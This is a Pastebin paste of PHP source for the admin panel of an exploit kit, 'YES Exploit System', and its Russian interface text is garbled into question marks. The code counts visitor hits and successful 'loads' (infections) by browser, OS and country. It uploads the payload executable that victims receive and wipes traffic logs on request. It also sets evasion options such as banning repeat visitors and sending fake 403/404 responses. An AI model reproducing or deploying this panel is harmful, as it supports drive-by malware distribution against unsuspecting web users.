Advertisement
Guest User

Untitled

a guest
Jul 11th, 2017
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.48 KB | None | 0 0
  1. <?php
  2. include '../config.php';
  3. include '../functions.php';
  4. $connect = mysql_connect($dbhost,$dbuser,$dbpass);
  5. mysql_select_db($dbname, $connect);
  6. include "./login.php";
  7. if(isset($_GET['do'])) $do = $_GET['do'];
  8. else $do = "";
  9. if($do == "")
  10. {
  11. echo "<html>\n";
  12. echo "<head>\n";
  13. echo "<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=ISO-8859-1\">\n";
  14. echo "<title>Admin-Panel</title>\n";
  15. echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"./css/ext-all.css\" >\n";
  16. echo "<script type=\"text/javascript\" src=\"./js/ext-base.js\"></script>\n";
  17. echo "<script type=\"text/javascript\" src=\"./js/ext-all.js\"></script>\n";
  18. echo "<script type=\"text/javascript\" src=\"js/StartMenu.js\"></script>\n";
  19. echo "<script type=\"text/javascript\" src=\"js/TaskBar.js\"></script>\n";
  20. echo "<script type=\"text/javascript\" src=\"js/Desktop.js\"></script>\n";
  21. echo "<script type=\"text/javascript\" src=\"js/App.js\"></script>\n";
  22. echo "<script type=\"text/javascript\" src=\"js/Module.js\"></script>\n";
  23. echo "<script type=\"text/javascript\" src=\"sample.php\"></script>\n";
  24. echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"css/desktop.css\" >\n";
  25. echo "</head>\n";
  26. echo "<body scroll=\"no\">\n";
  27. echo "<div id=\"x-desktop\">\n";
  28. echo "<dl id=\"x-shortcuts\">\n";
  29. echo "<dt id=\"acc-win-shortcut\">\n";
  30. echo "<a href=\"#\"><img src=\"images/s.gif\" >\n";
  31. echo "<div>??????????</div></a>\n";
  32. echo "</dt>\n";
  33. echo "<dt id=\"browsers-win-shortcut\">\n";
  34. echo "<a href=\"#\"><img src=\"images/s.gif\" >\n";
  35. echo "<div>????????</div></a>\n";
  36. echo "</dt>\n";
  37. echo "<dt id=\"syst-win-shortcut\">\n";
  38. echo "<a href=\"#\"><img src=\"images/s.gif\" >\n";
  39. echo "<div>???????</div></a>\n";
  40. echo "</dt>\n";
  41. echo "<dt id=\"ip-win-shortcut\">\n";
  42. echo "<a href=\"#\"><img src=\"images/s.gif\" >\n";
  43. echo "<div>IP-??????</div></a>\n";
  44. echo "</dt>\n";
  45. echo "<dt id=\"users-win-shortcut\">\n";
  46. echo "<a href=\"#\"><img src=\"images/s.gif\" >\n";
  47. echo "<div>??????</div></a>\n";
  48. echo "</dt>\n";
  49. echo "<dt id=\"ref-win-shortcut\">\n";
  50. echo "<a href=\"#\"><img src=\"images/s.gif\" >\n";
  51. echo "<div>????????</div></a>\n";
  52. echo "</dt>\n";
  53. echo "</dt>\n";
  54. echo "</dl>\n";
  55. echo "</div>\n";
  56. echo "<div id=\"ux-taskbar\">\n";
  57. echo "<div id=\"ux-taskbar-start\"></div>\n";
  58. echo "<div id=\"ux-taskbuttons-panel\"></div>\n";
  59. echo "<div class=\"x-clear\"></div>\n";
  60. echo "</div>\n";
  61. echo "</body>\n";
  62. echo "</html>\n";
  63. }
  64. else if($do == "exit")
  65. {
  66. $fzp = md5_file('../exe/file.exe');
  67. $ffzp = fopen('../exe/log.dat',"w+");
  68. fwrite($ffzp,$fzp);
  69. fclose($ffzp);
  70. setcookie('login');
  71. setcookie('passw');
  72. session_destroy();
  73. header("Location: index.php");
  74. }
  75. else if($do == "cl")
  76. {
  77. db_query('DELETE FROM `os`');
  78. db_query('DELETE FROM `browsers`');
  79. db_query('DELETE FROM `lip`');
  80. db_query('DELETE FROM `countries`');
  81. db_query('DELETE FROM `referers`');
  82. db_query('DELETE FROM `tds`');
  83. db_query('DELETE FROM `traff`');
  84. db_query('DELETE FROM `brow`');
  85. $del1 = scandir('../etc/load/');
  86. for($i=0;$i<=count($del1);$i++)
  87. {
  88. if(eregi('.dat',$del1[$i])) unlink('../etc/load/'.$del1[$i]);
  89. }
  90. $del2 = scandir('../etc/sall/');
  91. for($i=0;$i<=count($del2);$i++)
  92. {
  93. if(eregi('.dat',$del2[$i])) unlink('../etc/sall/'.$del2[$i]);
  94. }
  95. header("Location: index.php");
  96. }
  97. else if ($do == 'pda')
  98. {
  99. ?>
  100. <center><b>YES Exploit System</b><br>??????????: Lite</center>
  101. <table align=center>
  102. <tr><td>
  103. <table align=left border=1>
  104. <tr><td>??????? </td><td>?????? </td><td>????????</td></tr>
  105. <?php
  106. $sql = 'SELECT * FROM `browsers`';
  107. $res=mysql_query($sql, $connect);
  108. while ($row = mysql_fetch_assoc($res)) {
  109. ?>
  110. <tr><td><?php=$row['name']; ?></td><td><?php=$row['hits']; ?></td><td><?php=$row['loads']; ?></td></tr>
  111. <?php
  112. }
  113. ?>
  114. </table></td>
  115. <td><table align=center border=1>
  116. <tr><td>??????? </td><td>?????? </td><td>????????</td></tr>
  117. <?php
  118. $sql = 'SELECT * FROM `os`';
  119. $res=mysql_query($sql, $connect);
  120. while ($row = mysql_fetch_assoc($res)) {
  121. ?>
  122. <tr><td><?php=$row['name']; ?></td><td><?php=$row['hits']; ?></td><td><?php=$row['loads']; ?></td></tr>
  123. <?php
  124. }
  125. ?>
  126. </table></td>
  127. <td>
  128. <table align=right border=1>
  129. <tr><td>?????? </td><td>?????? </td><td>????????</td></tr>
  130. <?php
  131. $sql = 'SELECT * FROM `countries`';
  132. $res=mysql_query($sql, $connect);
  133. while ($row = mysql_fetch_assoc($res)) {
  134. if($row['name'] == 'O1') $row['name'] = '--';
  135. ?>
  136. <tr><td><?php=$row['name']; ?></td><td><?php=$row['hits']; ?></td><td><?php=$row['loads']; ?></td></tr>
  137. <?php
  138. }
  139. ?>
  140. </table></td></tr></table><br><br>
  141. <?php
  142. $sql = 'SELECT sum(`hits`) FROM `countries` WHERE 1';
  143. $res=mysql_query($sql, $connect);
  144. $res=mysql_fetch_assoc($res);
  145. $total=$res['sum(`hits`)'];
  146. $sql = 'SELECT sum(`loads`) FROM `countries` WHERE 1';
  147. $res=mysql_query($sql, $connect);
  148. $res=mysql_fetch_assoc($res);
  149. $loads=$res['sum(`loads`)'];
  150. ?>
  151. <center><b>????? ???????:</b> <?php=$total; ?><br><b>????? ????????:</b> <?php=$loads; ?></center>
  152. <?php
  153. }
  154. else if ($do == 'options') {
  155. $dbh = $_POST['o1'];
  156. if(empty($dbh)) $dbh = $dbhost;
  157. $dbn = $_POST['o2'];
  158. if(empty($dbn)) $dbn = $dbname;
  159. $dbu = $_POST['o3'];
  160. if(empty($dbu)) $dbu = $dbuser;
  161. $dbp = $_POST['o4'];
  162. if(empty($dbp)) $dbp = $dbpass;
  163. $adm = $_POST['o5'];
  164. if(empty($adm)) $adm = $r00t;
  165. $pw = $_POST['o6'];
  166. if(empty($pw)) $pw = $pwd;
  167. $b4n = $_POST['o7'];
  168. if(empty($b4n)) $b4n = $ban;
  169. $fk = $_POST['o8'];
  170. if(empty($fk)) $fk = $fake;
  171. $tr = $_POST['o9'];
  172. if(empty($tr)) $tr = $trash;
  173. $unun = $_POST['o10'];
  174. if(empty($unun)) $unun = $un_uniq;
  175. $cok = $_POST['o11'];
  176. if(empty($cok)) $cok = $cookie_time;
  177. $fil = $_POST['o13'];
  178. if(empty($inv)) $inv = $invisible;
  179. $pers = $_POST['o15'];
  180. if(empty($pers)) $pers = $percent;
  181. $ord = $_POST['o66'];
  182. if(empty($pers)) $ord = $ordure;
  183. if($_FILES["filename"]["size"] > 1024*3*1024) die("?????? ????? ????????? ??? ?????????!");
  184. if(copy($_FILES["filename"]["tmp_name"],
  185. "../exe/".$_FILES["filename"]["name"]))
  186. {
  187. $file_cop = '???? ??????? ????????!<br>';
  188. }
  189. $fp = fopen('../config.php',"w+");
  190. fwrite($fp, '<?php$dbhost = \''.$dbh.'\';$dbname = \''.$dbn.'\';$dbuser = \''.$dbu.'\';$dbpass = \''.$dbp.'\';$r00t = \''.$adm.'\';$pwd = \''.$pw.'\';$ban = \''.$b4n.'\';$fake = \''.$fk.'\';$trash = \''.$tr.'\';$un_uniq = \''.$unun.'\';$cookie_time = \''.$cok.'\';$invisible = \''.$inv.'\';$percent = \''.$pers.'\';$ordure = \''.$ord.'\'; ?>');
  191. fclose($fp);
  192. die('????????? ?????????!<br>'.$file_cop.'????? ????????? ???????? ? ????, ????????????? ???????? ????????.');
  193. }
  194. else if($do == 'opt') {
  195. ?>
  196. <html>
  197. <head>
  198. <link rel="stylesheet" type="text/css" href="./css/module.css">
  199. </head>
  200. <body bgcolor=ffffff>
  201. <table align=left class=tableBorder>
  202. <form action="?do=options" method=post enctype="multipart/form-data">
  203. <tr><td class="tableHeading">?????????:</td></tr>
  204. <tr><td class="tableHeading"><table>
  205. <tr><td>MySQL Host:</td><td><input type=text name=o1></td></tr>
  206. <tr><td>MySQL Base:</td><td><input type=text name=o2></td></tr>
  207. <tr><td>MySQL User:</td><td><input type=text name=o3></td></tr>
  208. <tr><td>MySQL Pass:</td><td><input type=text name=o4></td></tr>
  209. </table></td></tr>
  210. <tr><td class="tableHeading"><table>
  211. <tr><td>?????:</td><td><input type=text name=o5></td></tr>
  212. <tr><td>??????:</td><td><input type=text name=o6></td></tr>
  213. <tr><td>??????:</td><td><select name=o15><option selected></option><option value=1>????????? ? ????????</option><option value=2>????????? ? ????????</option><option value=3>?????????? ?????</option></td></tr>
  214. </table></td></tr>
  215. <tr><td class="tableHeading"><table>
  216. <tr><td>??? ????? ????????:</td><td><select name=o7><option selected></option><option value=yes>??</option><option value=no>???</option></td></tr>
  217. <tr><td>??? ?????? ? ?????:</td><td><input type=text name=o11></td></tr>
  218. <tr><td>???????? ??????:</td><td><select name=o8><option selected></option><option value=403>403</option><option value=404>404</option></td></tr>
  219. <tr><td>????? ?????????:</td><td><select name=o14><option selected></option><option value=yes>??</option><option value=no>???</option></td></tr>
  220. </table></td></tr>
  221. <tr><td class="tableHeading"><table>
  222. <tr><td>URL ??? ????????? ???? ??????:</td><td><input type=text name=o9></td></tr>
  223. <tr><td>URL ??? ????????? ????????:</td><td><input type=text name=o10></td></tr>
  224. <tr><td>???? ????????? ??????? yes\url:</td><td><input type=text name=o66></td></tr>
  225. <tr><td>????????? ????:</td><td> <input type="file" name="filename"></td></tr>
  226. </table></td></tr>
  227. <tr><td class="tableHeading"><input type=submit name=buton value="?????????"></td></tr>
  228. </form>
  229. </table>
  230. <body>
  231. </html>
  232. <?php
  233. }
  234. mysql_close($connect);
  235. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement